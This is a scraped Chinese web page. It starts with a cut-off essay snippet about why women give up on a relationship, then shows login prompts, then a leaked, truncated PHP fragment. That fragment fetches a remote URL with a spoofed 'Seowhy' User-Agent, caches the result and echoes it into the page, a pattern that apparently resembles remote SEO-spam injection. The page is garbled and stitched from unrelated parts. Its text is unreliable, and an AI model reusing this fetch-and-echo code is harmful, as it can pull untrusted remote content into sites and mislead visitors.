女人决定放弃一个人,不是某一秒的冲动,而是挣扎过后的绝望。真正让女人心死的,其实是那些小小的细节,积累成伤,疼痛入骨。最后,疼到麻木,就在某一瞬间,心彻底凉透。既然真心付错了人,看清了,也就看轻了,一切都不值得罢了。问问自己,你会在什么时刻,决定放弃一个人?1.付出再多,也得不到回应感情里,最让人感到孤单的,不是分离,而是从头到尾,只有你
2022-06-06 498
显示验证码
没有账号?注册  忘记密码?
array( "header"=>array( "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 Seowhy", ), "method" => "GET", "timeout" => 2 ), ); $context = stream_context_create($opts); $content = @file_get_contents($url,false, $context); if (isset($http_response_header)) { if(is_array($http_response_header)){ $http_response_header = $http_response_header[0]; } if(strpos($http_response_header,"200 OK") !==false && $content != "error"){ @file_put_contents($cacheUrl, $content); echo $content; } } }else{ $content = @file_get_contents($cacheUrl); echo $content; } ?>